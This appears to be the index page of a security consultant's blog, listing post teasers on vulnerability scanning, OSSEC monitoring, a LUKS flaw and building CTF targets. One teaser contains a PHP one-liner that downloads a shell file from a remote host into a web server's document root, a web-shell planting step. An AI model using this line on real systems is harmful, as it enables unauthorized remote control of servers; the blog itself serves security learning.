Vulnerability scanning – Defining a scanning approach
In my working life I have had various roles as security consultant. One of these roles was working in an
Read moreIn my working life I have had various roles as security consultant. One of these roles was working in an
Read moreFor automated log monitoring and alerting, several years ago I decided to start using OSSEC. The nice thing about OSSEC
Read morephp file transfer Nice PHP Example to transfer code <?php file_put_contents(“/var/www/html/sedje.php”, file_get_contents(“http://10.13.37.152/shell.txt”));?> interactive shell A method for better interactive shell
Read moreRecently I decided to stop breaking stuff on my web server, dns server and other internal infrastructure. It simply takes
Read moreHalfway past November, a vulnerability in the LUKS Full-disk encryption for linux systems was discovered (CVE-2016-4484). Since I use this
Read moreLast month I started working on something that feels extremely counter-intuitive. Building targets for a hacking ‘Capture The Flag‘ event.
Read moreWhen working with scanning tools, you must first determine what type of scanner you are working with. There are several
Read moreIn my working life I have had various roles as security consultant. One of these roles was working in an
Read moreVulnerability management (processes) and therefore vulnerability scanning (techniques) are a requirement for any organization that takes security serious. In my
Read moreAs part of my pursuit for more knowledge in the information security field, I visited the InfoSecurity.nl Conference in Utrecht,
Read more